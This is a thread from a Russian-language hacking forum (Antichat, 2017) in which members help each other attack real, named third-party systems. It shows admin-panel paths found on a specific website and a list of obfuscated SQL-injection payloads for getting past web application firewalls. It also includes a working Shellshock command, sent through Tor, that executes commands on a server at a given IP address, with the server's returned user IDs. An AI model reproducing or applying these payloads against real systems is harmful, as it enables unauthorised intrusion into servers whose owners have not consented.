HOME FORUMS MEMBERS RECENT POSTS LOG IN  
× Авторизация
Имя пользователя:
Пароль:
Нет аккаунта? Регистрация
Баннер 1   Баннер 2

ANTICHAT — форум по информационной безопасности, OSINT и технологиям

ANTICHAT — русскоязычное сообщество по безопасности, OSINT и программированию. Форум ранее работал на доменах antichat.ru, antichat.com и antichat.club, и теперь снова доступен на новом адресе — forum.antichat.xyz.
Форум восстановлен и продолжает развитие: доступны архивные темы, добавляются новые обсуждения и материалы.
⚠️ Старые аккаунты восстановить невозможно — необходимо зарегистрироваться заново.
Вернуться   Форум АНТИЧАТ > БЕЗОПАСНОСТЬ И УЯЗВИМОСТИ > Уязвимости
   
Ответ
 
Опции темы Поиск в этой теме Опции просмотра

  #1  
Старый 14.02.2017, 17:45
Shubka75
Познающий
Регистрация: 24.09.2015
Сообщений: 35
Провел на форуме:
11851

Репутация: 30
По умолчанию

Цитата:
Сообщение от DezMond™  

Код:
http://www.biofuelstp.eu/
Помогите админку найти!
Код:
http://www.biofuelstp.eu/mapping/login.php
http://biofuelstp.eu/sqladmin
http://www.biofuelstp.eu/algaetaskforce/atf_home.html
 
Ответить с цитированием

  #2  
Старый 14.02.2017, 20:35
cMs
Новичок
Регистрация: 14.02.2017
Сообщений: 10
Провел на форуме:
3550

Репутация: 0
По умолчанию

Доброго времени суток.

Не подскажите как пробросить version() через WAF sweb.

https://rdot.org/forum/showthread.php?t=60 - все выше перечисленные способы фильтрует.
 
Ответить с цитированием

  #3  
Старый 15.02.2017, 09:54
sander
Новичок
Регистрация: 14.06.2010
Сообщений: 0
Провел на форуме:
2065

Репутация: 0
По умолчанию

Цитата:
Сообщение от [aywo  
"]
[aywo] said:

Что конкретно тебе подойдет можно только гадать. Зависит от того, Чем и Как фильтруется. Копай в сторону обфускации SQL-запросов.
Вот небольшая подборка по теме:
https://github.com/client9/libinject...-bhusa2013.txt
Стандартная ошибка :

.SpoilerTarget" type="button">Spoiler
Not Acceptable

An appropriate representation of the requested resource .......... could not be found on this server.

Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.

Apache/2.2.23 (Unix) mod_ssl/2.2.23 OpenSSL/1.0.0-fips mod_auth_passthrough/2.1 mod_bwlimited/1.4 PHP/5.2.17 mod_perl/2.0.6 Perl/v5.10.1 Server at www.............. Port 80
mod_security by pass .
 
Ответить с цитированием

  #4  
Старый 15.02.2017, 10:15
[aywo]
Познающий
Регистрация: 01.02.2007
Сообщений: 89
Провел на форуме:
1668307

Репутация: 114
По умолчанию

Цитата:
Сообщение от SaNDER  

Стандартная ошибка :
mod_security by pass .
попробуй что-то из следующего:

https://rdot.org/forum/showthread.php?t=3481

либо

Код:
id=1%252f%252a*/union%252f%252a /select%252f%252a*/1,2,3%252f%252a*/from%252f%252a*/users--

id=1+uni%0bon+se%0blect+1,2,3--

id=1+UNunionION+SEselectLECT+1,2,3--

id=1+UnIoN/**/SeLecT/**/1,2,3--

id=1+un/**/ion+se/**/lect+1,2,3--

id=0+div+1+union%23foo*%2F*bar%0D%0Aselect%23foo%0D%0A1%2C2%2Ccurrent_user

?/%2A%2A/union/%2A%2A/select…

1/*!UnIoN*/SeLecT+1,2,3--

id=/*!UnIoN*/+/*!SeLecT*/+1,2,concat(/*!table_name*/)+FrOm/*!information_schema*/.tables
/*!WhErE*/+/*!TaBlE_sChEMa*/+like+database()--
 
Ответить с цитированием

  #5  
Старый 15.02.2017, 11:18
sander
Новичок
Регистрация: 14.06.2010
Сообщений: 0
Провел на форуме:
2065

Репутация: 0
По умолчанию

Цитата:
Сообщение от [aywo  
"]
[aywo] said:

попробуй что-то из следующего:
https://rdot.org/forum/showthread.php?t=3481
либо
Код:
id=1%252f%252a*/union%252f%252a /select%252f%252a*/1,2,3%252f%252a*/from%252f%252a*/users--

id=1+uni%0bon+se%0blect+1,2,3--

id=1+UNunionION+SEselectLECT+1,2,3--

id=1+UnIoN/**/SeLecT/**/1,2,3--

id=1+un/**/ion+se/**/lect+1,2,3--

id=0+div+1+union%23foo*%2F*bar%0D%0Aselect%23foo%0D%0A1%2C2%2Ccurrent_user

?/%2A%2A/union/%2A%2A/select…

1/*!UnIoN*/SeLecT+1,2,3--

id=/*!UnIoN*/+/*!SeLecT*/+1,2,concat(/*!table_name*/)+FrOm/*!information_schema*/.tables
/*!WhErE*/+/*!TaBlE_sChEMa*/+like+database()--
С обходом пробовал всё это . Токо как бы запросы не составлял постоянно типичная ошибка : You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '' at line 1
 
Ответить с цитированием

  #6  
Старый 15.02.2017, 11:19
Gorev
Познавший АНТИЧАТ
Регистрация: 31.03.2006
Сообщений: 1,167
Провел на форуме:
4072944

Репутация: 1550


По умолчанию

Цитата:
Сообщение от qqq1457  

отправляю сюда 79.171.115.8:8080//cgi-bin/wlogin методом get в Referer такое: () { Referer; }; echo -e "Content-Type: text/plain\n"; pwd
выполняется код,получаем Bash code injection vulnerability.вопрос: почему не выполняются команды: id,ls,uname ? и т д но
выполняются pwd и help?
акунетикс сильно логи засоряет, советую отказаться от активного пользования этим интсрументом вживую, и еще перехвати запросы акунетикса и посмотри что он отправляет на самом деле
 
Ответить с цитированием

  #7  
Старый 15.02.2017, 12:16
Gorev
Познавший АНТИЧАТ
Регистрация: 31.03.2006
Сообщений: 1,167
Провел на форуме:
4072944

Репутация: 1550


По умолчанию

Цитата:
Сообщение от qqq1457  

а чем лучше отправлять post,get? да но на другом серве все норм исполняется
в лисе много плагинов которые прекрасно справляются с этими задачами, hackbar к примеру
 
Ответить с цитированием

  #8  
Старый 15.02.2017, 12:23
Gorev
Познавший АНТИЧАТ
Регистрация: 31.03.2006
Сообщений: 1,167
Провел на форуме:
4072944

Репутация: 1550


По умолчанию

Цитата:
Сообщение от qqq1457  

я про отдельную прогу,ну да ладно,спасибо
проги обычно порождают паразитные запросы как и акунетикс
 
Ответить с цитированием

  #9  
Старый 15.02.2017, 14:57
t0ma5
Постоянный
Регистрация: 10.02.2012
Сообщений: 830
Провел на форуме:
300820

Репутация: 90


По умолчанию

Цитата:
Сообщение от [aywo  
"]
[aywo] said:

Потому, что данные команды недоступны для web-сервера из-под юзера, под которым работает web-сервер
доступны, просто есть нюанс
 
Ответить с цитированием

  #10  
Старый 15.02.2017, 15:39
t0ma5
Постоянный
Регистрация: 10.02.2012
Сообщений: 830
Провел на форуме:
300820

Репутация: 90


По умолчанию

Цитата:
Сообщение от [aywo  
"]
[aywo] said:

я, если честно, в диком ахуе, во что превратился ачат. Раньше тут не было столько школьников... хотя нынешних троллей даже школьниками не назвать. Помню Белого Жорика банили, за то, что гопника Kez'а троллил, как только мог. Но никто не поспорит,, что Жорик был профи в XSS. Даже большенство современной гринки ему в подметки не сгодятся, он развлекался хеком, и действительно делал это с юмором. Красный дядька+++ думал, что он ферзь йптваюматьнахявсеяинтерне т, ну или пытался таким казаться. А вот Elect, Algol, ettee - реально крутые мужики.
А что здесь происходит сейчас? Script kiddie - это тру хакеры в современном мире
ты написал самый вероятный случай, а я открыл консоль и разобрался, можно конечно злится и писать что вчера трава была зеленее, но выглядит это дешево

и тролей тут без меня хватает

Код:
~$ curl --proxy socks5://127.0.0.1:9150 '79.171.115.8:8080/cgi-bin/wlogin' -H 'Referer: () { Referer; }; echo -e "Content-Type: text/plain\n";echo $(/bin/id)'
uid=1777(meteo) gid=1778(meteo) groups=501(fdp),1778(meteo)
 
Ответить с цитированием
Ответ





Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
 


Быстрый переход




ANTICHAT ™ © 2001- Antichat Kft.